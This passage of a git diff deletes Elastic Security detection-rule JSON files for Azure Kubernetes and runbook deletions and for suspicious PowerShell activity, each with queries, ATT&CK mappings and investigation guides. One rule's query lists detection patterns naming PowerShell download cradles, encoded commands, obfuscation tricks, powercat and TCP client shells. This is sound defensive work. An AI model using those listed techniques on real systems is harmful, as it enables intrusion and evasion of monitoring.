"Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 2 - }, - "id": "82f842c2-7c36-438c-b562-5afe54ab11f4_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_103.json 
b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_103.json deleted file mode 100644 index 41e3e7186ef..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_103.json +++ /dev/null @@ -1,75 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment.", - "false_positives": [ - "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Pods deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Kubernetes Pods Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Kubernetes Pods Deleted\n\nAzure Kubernetes Service (AKS) enables the deployment, management, and scaling of containerized applications using Kubernetes. Pods, the smallest deployable units in Kubernetes, can be targeted by adversaries to disrupt services or evade detection. Malicious actors might delete pods to cause downtime or hide their activities. The detection rule monitors Azure activity logs for successful pod deletion operations, alerting security teams to potential unauthorized actions that could impact the environment's stability and security.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the details of the pod deletion event, focusing on the operation name \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and ensuring the event outcome is marked as \"Success\".\n- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs.\n- Check the timeline of events leading up to the pod deletion to identify any unusual or unauthorized access patterns or activities.\n- Investigate the specific Kubernetes cluster and namespace where the pod deletion occurred to assess the potential impact on services and applications.\n- Cross-reference the deleted pod's details with recent changes or deployments in the environment to determine if the deletion was part of a legitimate maintenance or deployment activity.\n- Consult with the relevant application or infrastructure teams to verify if the pod deletion was authorized and necessary, or if it indicates a potential security incident.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel can lead to legitimate pod deletions. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scaling operations might delete pods as part of normal scaling activities. 
Identify and exclude these operations by correlating with scaling events or using tags that indicate automated processes.\n- Development and testing environments often experience frequent pod deletions as part of normal operations. Consider excluding these environments from alerts by using environment-specific identifiers or tags.\n- Scheduled job completions may result in pod deletions once tasks are finished. Implement rules to recognize and exclude these scheduled operations by matching them with known job schedules or identifiers.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes cluster to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules temporarily.\n- Review the Azure activity logs to identify the source of the deletion request, including the user or service principal involved, and verify if the action was authorized.\n- Recreate the deleted pods using the latest known good configuration to restore services and minimize downtime.\n- Conduct a thorough security assessment of the affected cluster to identify any additional unauthorized changes or indicators of compromise.\n- Implement stricter access controls and role-based access management to ensure only authorized personnel can delete pods in the future.\n- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected.\n- Enhance monitoring and alerting for similar activities by integrating with a Security Information and Event Management (SIEM) system to detect and respond to unauthorized pod deletions promptly.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "83a1931d-8136-46fc-b7b9-2db4f639e014", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Asset Visibility", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "83a1931d-8136-46fc-b7b9-2db4f639e014_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_206.json b/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_206.json deleted file mode 100644 index 782b5fabf5b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_206.json +++ /dev/null @@ 
-1,121 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell.", - "from": "now-9m", - "index": [ - "logs-crowdstrike.fdr*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*", - "logs-system.security*", - "logs-windows.forwarded*", - "logs-windows.sysmon_operational-*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious Windows Powershell Arguments", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Windows Powershell Arguments\n\nPowerShell is a powerful scripting language and command-line shell used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's capabilities to execute malicious scripts, download payloads, and obfuscate commands. The detection rule identifies unusual PowerShell arguments indicative of such abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques, thereby flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the process command line and arguments to identify any encoded or obfuscated content, such as Base64 strings or unusual character sequences, which may indicate malicious intent.\n- Check the parent process of the PowerShell execution, especially if it is explorer.exe or cmd.exe, to determine if the PowerShell instance was launched from a suspicious or unexpected source.\n- Investigate any network activity associated with the PowerShell process, particularly looking for connections to known malicious domains or IP addresses, or the use of suspicious commands like DownloadFile or DownloadString.\n- Examine the user account associated with the PowerShell execution to determine if it aligns with expected behavior or if it might be compromised.\n- Correlate the event with other security alerts or logs from the same host or user to identify patterns or additional indicators of compromise.\n- Assess the risk and impact of the detected activity by considering the context of the environment, such as the presence of sensitive data or critical systems that might be affected.\n\n### False positive analysis\n\n- Legitimate administrative scripts may use encoded commands for obfuscation to protect sensitive data. Review the script's source and purpose to determine if it is authorized. If confirmed, add the script's hash or specific command pattern to an allowlist.\n- Automated software deployment tools might use PowerShell to download and execute scripts from trusted internal sources. Verify the source and destination of the download. If legitimate, exclude the specific tool or process from the detection rule.\n- System maintenance tasks often involve PowerShell scripts that manipulate files or system settings. Identify routine maintenance scripts and exclude their specific command patterns or file paths from triggering the rule.\n- Security software may use PowerShell for scanning or remediation tasks, which can mimic suspicious behavior. 
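The triage steps for this rule recommend decoding any Base64 or otherwise encoded content found in the PowerShell command line. As a rough illustration of that step (not part of the rule itself; the sample script string below is hypothetical), note that `-enc`/`-EncodedCommand` payloads are Base64 over UTF-16LE text, so both steps are needed when recovering the script:

```python
import base64

# Illustrative only: a script body an analyst might recover during triage.
sample_script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/payload.ps1')"

# PowerShell's -enc / -EncodedCommand argument is Base64 over UTF-16LE text,
# so encoding and decoding both require the utf-16-le codec.
encoded = base64.b64encode(sample_script.encode("utf-16-le")).decode("ascii")

# During an investigation, `encoded` would instead come from the value
# following -enc in process.command_line; decode it to review the script.
decoded = base64.b64decode(encoded).decode("utf-16-le")
assert decoded == sample_script
print(decoded)
```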
Confirm the software's legitimacy and add its processes to an exception list to prevent false alerts.\n- Developers might use PowerShell for testing or development purposes, which can include obfuscation techniques. Validate the developer's activities and exclude their specific development environments or scripts from the rule.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further spread or communication with potential command and control servers.\n- Terminate any suspicious PowerShell processes identified by the detection rule to halt ongoing malicious activities.\n- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or scripts.\n- Review and clean up any unauthorized changes to system configurations or scheduled tasks that may have been altered by the malicious PowerShell activity.\n- Restore any affected files or system components from known good backups to ensure system integrity and functionality.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are compromised.\n- Implement additional monitoring and logging for PowerShell activities across the network to enhance detection of similar threats in the future.", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"powershell.exe\" and\n (\n process.command_line :\n (\n \"*^*^*^*^*^*^*^*^*^*\",\n \"*`*`*`*`*\",\n \"*+*+*+*+*+*+*\",\n \"*[char[]](*)*-join*\",\n \"*Base64String*\",\n \"*[*Convert]*\",\n \"*.Compression.*\",\n \"*-join($*\",\n \"*.replace*\",\n \"*MemoryStream*\",\n \"*WriteAllBytes*\",\n \"* -enc *\",\n \"* -ec *\",\n \"* /e *\",\n \"* /enc *\",\n \"* /ec *\",\n \"*WebClient*\",\n \"*DownloadFile*\",\n \"*DownloadString*\",\n \"* iex*\",\n \"* iwr*\",\n \"*Reflection.Assembly*\",\n \"*Assembly.GetType*\",\n \"*$env:temp\\\\*start*\",\n \"*powercat*\",\n \"*nslookup -q=txt*\",\n \"*$host.UI.PromptForCredential*\",\n \"*Net.Sockets.TCPClient*\",\n \"*curl *;Start*\",\n \"powershell.exe \\\"<#*\",\n \"*ssh -p *\",\n \"*http*|iex*\",\n \"*@SSL\\\\DavWWWRoot\\\\*.ps1*\",\n \"*.lnk*.Seek(0x*\",\n \"*[string]::join(*\",\n \"*[Array]::Reverse($*\",\n \"* hidden $(gc *\",\n \"*=wscri& set*\",\n \"*http'+'s://*\",\n \"*.content|i''Ex*\",\n \"*//:sptth*\",\n \"*//:ptth*\",\n \"*$*=Get-Content*AppData*.SubString(*$*\",\n \"*=cat *AppData*.substring(*);*$*\"\n ) or\n\n (process.args : \"-c\" and process.args : \"&{'*\") or\n\n (process.args : \"-Outfile\" and process.args : \"Start*\") or\n\n (process.args : \"-bxor\" and process.args : \"0x*\") or\n\n process.args : \"$*$*;set-alias\" or\n\n (process.parent.name : (\"explorer.exe\", \"cmd.exe\") and\n process.command_line : (\"*-encodedCommand*\", \"*Invoke-webrequest*\", \"*WebClient*\", \"*Reflection.Assembly*\"))\n )\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - }, - { - "package": "system", - "version": "^2.0.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" - }, - { - "package": "m365_defender", - "version": "^3.0.0" - }, - { - "package": "crowdstrike", - "version": "^1.1.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": 
"keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "83bf249e-4348-47ba-9741-1202a09556ad", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 206 - }, - "id": "83bf249e-4348-47ba-9741-1202a09556ad_206", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_211.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_211.json deleted file mode 100644 index d777c1b8c0c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_211.json +++ /dev/null @@ -1,109 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "logs-endpoint.events.library-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious PowerShell Engine ImageLoad", - "new_terms_fields": [ - "host.id", - "process.executable", - "user.id" - ], - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
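The retrieval step above suggests hashing the recovered DLL or executable with `Get-FileHash` before checking reputation services such as VirusTotal. A minimal Python equivalent of that hashing step, assuming the artifact has already been copied to an analysis workstation (the path below is a placeholder):

```python
import hashlib
from pathlib import Path


def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Return the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


# Placeholder path for a DLL retrieved during triage; substitute the real artifact.
print(sha256_of("artifacts/System.Management.Automation_sample.dll"))
```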
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "host.os.type:windows and event.category:library and \n dll.name:(\"System.Management.Automation.dll\" or \"System.Management.Automation.ni.dll\") and \n not (\n process.code_signature.subject_name:(\"Microsoft Corporation\" or \"Microsoft Dynamic Code Publisher\" or \"Microsoft Windows\") and process.code_signature.trusted:true and not process.name.caseless:(\"regsvr32.exe\" or \"rundll32.exe\")\n ) and \n not (\n process.executable.caseless:(C\\:\\\\Program*Files*\\(x86\\)\\\\*.exe or C\\:\\\\Program*Files\\\\*.exe) and\n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: C\\:\\\\Windows\\\\Lenovo\\\\*.exe and process.code_signature.subject_name:\"Lenovo\" and \n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: \"C:\\\\ProgramData\\\\chocolatey\\\\choco.exe\" and\n process.code_signature.subject_name:\"Chocolatey Software, Inc.\" and process.code_signature.trusted:true\n ) and not process.executable.caseless : \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n", - "references": [ - "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "dll.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.subject_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.trusted", - "type": "boolean" - }, - { - "ecs": false, - "name": "process.executable.caseless", - "type": "unknown" - }, - { - "ecs": false, - "name": "process.name.caseless", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 211 - }, - "id": "852c1f19-68e8-43a6-9dce-340771fe1be3_211", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103.json b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103.json deleted file mode 100644 index bf1ef36138d..00000000000 --- 
a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", - "false_positives": [ - "Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Kubernetes Events Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Kubernetes Events Deleted\n\nAzure Kubernetes Service (AKS) manages containerized applications using Kubernetes, which logs events like state changes. These logs are crucial for monitoring and troubleshooting. Adversaries may delete these logs to hide their tracks, impairing defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs, flagging successful deletion operations to alert security teams of potential evasion tactics.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking for the operation name \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and ensure the event outcome is marked as \"Success\".\n- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs.\n- Investigate the timeline of events leading up to and following the deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or configuration changes.\n- Check for any other related alerts or anomalies in the Azure environment that might indicate a broader attack or compromise.\n- Assess the impact of the deleted events by determining which Kubernetes resources or operations were affected and if any critical logs were lost.\n- Review access controls and permissions for the user or service principal involved to ensure they align with the principle of least privilege and adjust if necessary.\n- Consider implementing additional monitoring or alerting for similar deletion activities to enhance detection and response capabilities.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger deletion events. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scripts or tools used for log rotation or cleanup might delete events as part of their normal operation. 
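The triage steps for this rule come down to confirming the delete operations and attributing them to an identity. A rough sketch of that pivot with the Python Elasticsearch client is shown below; the endpoint, credentials, and the aggregation field are assumptions to adapt (`user.name` stands in for wherever your Azure integration records the caller identity):

```python
from elasticsearch import Elasticsearch

# Placeholder endpoint and credentials; point this at your own cluster.
es = Elasticsearch("https://localhost:9200", api_key="<api-key>")

# Mirror the rule's logic with explicit filters, then group matching
# deletions by actor to see who issued them.
response = es.search(
    index=["filebeat-*", "logs-azure*"],
    size=0,
    query={
        "bool": {
            "filter": [
                {"term": {"event.dataset": "azure.activitylogs"}},
                {"term": {"azure.activitylogs.operation_name": "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE"}},
                {"terms": {"event.outcome": ["Success", "success"]}},
            ]
        }
    },
    # Assumed actor field; adjust to your mappings.
    aggs={"actors": {"terms": {"field": "user.name", "size": 20}}},
)

for bucket in response["aggregations"]["actors"]["buckets"]:
    print(bucket["key"], bucket["doc_count"])
```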
Identify these scripts and exclude their activity from triggering alerts by whitelisting their associated service accounts or IP addresses.\n- Misconfigured applications or services that inadvertently delete logs can cause false positives. Review application configurations and adjust them to prevent unnecessary deletions, and exclude these applications from alerts if they are verified as non-threatening.\n- Test environments often generate log deletions during setup or teardown processes. Exclude these environments from monitoring or create specific rules that differentiate between production and test environments to avoid unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Kubernetes cluster to prevent further unauthorized access or tampering with logs.\n- Conduct a thorough review of recent activity logs and access permissions for the affected cluster to identify any unauthorized access or privilege escalation.\n- Restore deleted Kubernetes events from backups or snapshots if available, to ensure continuity in monitoring and auditing.\n- Implement stricter access controls and audit logging for Kubernetes event deletion operations to prevent unauthorized deletions in the future.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of broader compromise or if the deletion is part of a larger attack campaign.\n- Review and update incident response plans to incorporate lessons learned from this event, ensuring quicker detection and response to similar threats in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "8b64d36a-1307-4b2e-a77b-a0027e4d27c8", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103", - "type": "security-rule" -} \ No newline at end of file diff --git 
a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_103.json b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_103.json deleted file mode 100644 index 9dfed2fa875..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_103.json +++ /dev/null @@ -1,75 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Runbook Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Runbook Deleted\n\nAzure Automation Runbooks automate repetitive tasks in cloud environments, enhancing operational efficiency. Adversaries may exploit this by deleting runbooks to disrupt operations or conceal malicious activities. The detection rule monitors Azure activity logs for successful runbook deletions, signaling potential defense evasion tactics, and alerts analysts to investigate further.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking the operation name \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs.\n- Investigate the timeline of events leading up to and following the runbook deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or changes to other resources.\n- Check for any recent modifications or unusual activities in the affected Azure Automation account to determine if there are other signs of compromise or tampering.\n- Assess the impact of the deleted runbook on business operations and determine if any critical automation processes were disrupted.\n- If applicable, review any available backup or version history of the deleted runbook to restore it and mitigate operational disruptions.\n\n### False positive analysis\n\n- Routine maintenance activities by IT staff may lead to legitimate runbook deletions. To manage this, create exceptions for known maintenance periods or specific user accounts responsible for these tasks.\n- Automated scripts or third-party tools that manage runbooks might trigger deletions as part of their normal operation. Identify these tools and exclude their activity from alerts by filtering based on their service accounts or IP addresses.\n- Organizational policy changes or cloud environment restructuring can result in planned runbook deletions. Document these changes and adjust the detection rule to exclude these events by correlating with change management records.\n- Test environments often involve frequent creation and deletion of runbooks. 
Exclude these environments from alerts by using tags or specific resource group identifiers associated with non-production environments.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Automation account to prevent further unauthorized deletions or modifications of runbooks.\n- Review the Azure activity logs to identify the user or service principal responsible for the deletion and revoke their access if unauthorized.\n- Restore the deleted runbook from backups or version control if available, ensuring that the restored version is free from any malicious modifications.\n- Conduct a security review of all remaining runbooks to ensure they have not been tampered with or contain malicious code.\n- Implement stricter access controls and auditing for Azure Automation accounts, ensuring that only authorized personnel have the ability to delete runbooks.\n- Escalate the incident to the security operations team for further investigation and to determine if additional malicious activities have occurred.\n- Enhance monitoring and alerting for similar activities by integrating additional context or indicators from the MITRE ATT&CK framework related to defense evasion tactics.", - "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and\n event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", 